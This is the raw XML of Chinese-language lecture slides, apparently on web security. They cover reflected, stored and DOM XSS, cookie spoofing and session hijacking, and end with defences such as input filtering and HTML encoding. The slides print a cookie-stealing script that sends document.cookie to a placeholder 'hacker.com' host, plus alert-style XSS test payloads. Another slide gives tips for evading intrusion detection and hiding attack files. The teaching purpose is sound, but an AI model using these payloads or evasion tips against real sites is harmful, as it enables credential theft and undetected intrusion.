              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>嵌入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>中的恶意脚本在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的浏览器中执行，就像它直接来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的服务器一样。此脚本盗窃敏感信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>授权、信用卡、帐号信息等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>，然后在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>完全不知情的情况下将这些信息发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>站点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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6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252506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后面加入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=&lt;scrip&gt;alert(/XSS/)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;/scrip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4" name="图片 3" descr="xs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788" y="2466362"/>
            <a:ext cx="7286625" cy="439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4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363" y="1344613"/>
            <a:ext cx="7772400" cy="4114800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zh-CN" sz="2800" dirty="0"/>
              <a:t>储存式跨站脚本攻击，也称为持久性跨站脚本攻击。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>程序允许存储用户数据，并且存储的输入数据没有经过正确的过滤，就有可能发生这类攻击。在这种攻击模式下，攻击者并不需要利用一个恶意链接，只要用户访问了储存式跨站脚本网页，那么恶意数据就将显示为网站的一部分并以受害者身份执行。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储存式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>拥有一个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站点，该站点允许用户发布信息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浏览已发布的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注意到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>的站点具有类型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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>发布一个热点信息，吸引其它用户纷纷阅读。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>或者是任何的其他人如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>浏览该信息，其会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>或者其它信息将被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Charly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>盗走。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532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储存式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS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19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3E9A775-9304-4789-A51D-6C6B3FEA4832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325635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黑客的隐秘攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325636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在攻击过程中往往需要上传源程序到目标主机上进行编译，传送过程中应当采用某种过程的加密，但是一般不使用操作系统中标准的编码命令（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>uuencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>uudecode),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这些命令很少被合法用户使用，大多数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会对这些命令保持警惕。使用编辑器提供的字符替换功能很容易达到对源代码变换的目的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8085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储存式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4" name="图片 3" descr="说明: tes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057" y="1704975"/>
            <a:ext cx="526478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47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储存式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5" name="图片 4" descr="说明: xsse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857" y="1456372"/>
            <a:ext cx="6607493" cy="190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说明: ac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177" y="3882707"/>
            <a:ext cx="2620645" cy="139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66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储存式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643063" y="3616325"/>
            <a:ext cx="6092825" cy="13112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latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt;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latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>window.location="http://www.hacker.com/steal.cgi?ck="+document.cookie;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latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a: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3614738" y="1733550"/>
            <a:ext cx="183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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>留言版</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4300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363" y="2405063"/>
            <a:ext cx="7521575" cy="2719387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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1638300" y="3592513"/>
            <a:ext cx="6092825" cy="13112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solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt;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solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>window.location="http://www.hacker.com/steal.cgi?ck="+document.cookie;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solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-12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699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dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以重构整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档，可以添加、移除、改变或者重排页面上的项目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要改变页面上的某个东西，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就需要获得对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档中所有元素进行访问的入口，这个入口，连同对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>元素进行添加、移动、改变或移除的方法和属性，都是通过文档对象模型来获得的。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式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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8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1290638"/>
            <a:ext cx="87344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do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8345" y="5490845"/>
            <a:ext cx="4880610" cy="7340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82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296988"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>如果构造数据“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>‘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=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(/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/)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”，那么最后添加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>代码就变成了“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>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=’ ‘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=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(/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/)’&gt;test&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”，插入一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>事件，点击提交按键，那么就会发生一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>攻击。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6" name="图片 5" descr="dom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227" y="4190928"/>
            <a:ext cx="4793615" cy="206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23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防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻击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151812" cy="489426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dirty="0"/>
              <a:t>对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应用程序的所有输入进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，对危险的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>字符进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>‘&lt;’ ,  ‘&gt;’ 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dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  ‘&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>;’      ,  ‘&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>;’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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>‘(‘  ,  ‘)’  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dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  ‘&amp;#40;’  ,  ‘&amp;#41;’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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>‘#‘ , ‘&amp;’ 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dirty="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  ‘&amp;#35;’   ,  ‘&amp;#38;‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对用户进行培训，告知小心使用电子邮件消息或即时消息中的链接；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>防止访问已知的恶意网站；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>执行手工或自动化代码扫描，确定并消除潜在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20926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22135" y="2946224"/>
            <a:ext cx="5812325" cy="5866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三、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欺骗及防范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0377" y="1346345"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息，绕过网站的验证过程，不需要输入密码，就可以登录网站，甚至进入网站管理后台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伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty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7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0377" y="1346345"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>网站登录验证代码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伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>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1" y="2154455"/>
            <a:ext cx="50958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528681" y="1668352"/>
            <a:ext cx="34152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fr-FR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request.Cookies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语句分别获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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Cookies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中的用户名、口令和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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randomid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的值。如果用户名或口令为空或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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randomid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值不等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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就跳转到登录界面。也就是说，程序是通过验证用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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Cookie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信息来确认用户是否已登录。然而，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Cookie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信息是可以在本地修改的，只要改后的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Cookie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信息符合验证条件（用户名和口令不空且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="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randomid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值等于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），就可进入管理后台界面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b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2025017-6C04-4EA5-94D1-56D1E08E7F97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326659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黑客的隐秘攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62464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扫描采取缓慢和分布式的，不按顺序扫描整个网段，将攻击过程分散到多个会话过程中。攻击不导致系统和网络出现明显的异常，不会导致日志的快速增长</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>攻击代码不使用敏感的文件名，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Readme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>这样的常见形式，管理员发现这些文件的可能性要小得多。不会将攻击程序放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>/usr/sbin,/etc,/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>等敏感目录，文件完整性校验程序会检查这些目录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1247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0377" y="1346345"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>判断是否有删帖权限的代码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伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息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1414" y="4953313"/>
            <a:ext cx="596012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只要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Cookie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中的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power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值不小于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500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，任意用户都可以删除任意帖子。同样可以利用上面介绍的方法进行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Cookie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欺骗攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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14" y="2153047"/>
            <a:ext cx="6410325" cy="24479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874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7250" y="1277072"/>
            <a:ext cx="8069550" cy="4929764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>上面介绍的两个攻击例子之所以成功，是因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中保存了用户名、口令以及权限信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>而留下了安全隐患。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安全原则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>一般情况下，网站会话管理机制仅将会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>保存至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，而将数据本身保存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器的内存或文件、数据库中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伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty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6522" y="1443327"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>设置安全属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>内容在网络中用明文传输，攻击者监听到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>内容后可以轻松实现会话劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为什么会不设置安全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zh-CN" kern="1200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>一种是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="1200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>应用开发者不知道安全属性或不愿意使用安全属性；第二种是设置安全属性后应用无法运行。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监听</a:t>
            </a:r>
